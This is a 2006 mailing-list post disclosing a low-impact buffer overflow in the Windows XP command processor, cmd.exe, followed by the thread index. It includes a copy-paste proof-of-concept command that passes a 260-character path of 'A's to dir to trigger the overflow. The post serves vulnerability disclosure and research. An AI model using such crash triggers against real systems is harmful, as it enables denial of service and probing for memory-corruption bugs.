Vulnerability Development mailing list archives

Windows Command Processor CMD.EXE Buffer Overflow

From: "gregory_panakkal" <gregory_panakkal () fastmail fm>
Date: Thu, 19 Oct 2006 09:03:26 +0530


Windows Command Processor CMD.EXE Buffer Overflow
Tested on WinXP SP2
Impact - Very Low


Copy-paste the following line in cmd.exe and execute it..
(it is a single command, has been split into multiple lines for
readability sake).

%COMSPEC% /K "dir
\\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

(260 characters of 'A's)

DEP Comes into the picture.

URL :
http://www.infogreg.com/security/misc/windows-command-processor-cmd.exe-buffer-overflow.html

regards,
Gregory Panakkal
www.infogreg.com
-- 
  gregory_panakkal
  gregory_panakkal () fastmail fm

-- 
http://www.fastmail.fm - I mean, what is it about a decent email service?

Current thread:

Windows Command Processor CMD.EXE Buffer Overflow gregory_panakkal (Oct 19)
- Re: Windows Command Processor CMD.EXE Buffer Overflow The SNiFF (Oct 20)
  - RE: Windows Command Processor CMD.EXE Buffer Overflow Luis Alberto Cortes Zavala (Oct 21)
- RE: Windows Command Processor CMD.EXE Buffer Overflow Osvaldo Casagrande (Oct 20)
  - RE: Windows Command Processor CMD.EXE Buffer Overflow Marvin Simkin (Oct 21)
    - RE: Windows Command Processor CMD.EXE Buffer Overflow Marvin Simkin (Oct 21)
    - RE: Windows Command Processor CMD.EXE Buffer Overflow gregory_panakkal (Oct 21)
    - Re: Windows Command Processor CMD.EXE Buffer Overflow Dan Yefimov (Oct 22)
    - RE: Windows Command Processor CMD.EXE Buffer Overflow Luis Alberto Cortes Zavala (Oct 22)
    - Re: Windows Command Processor CMD.EXE Buffer Overflow Dan Yefimov (Oct 23)
    - Re: Windows Command Processor CMD.EXE Buffer Overflow Danux (Oct 23)

(Thread continues...)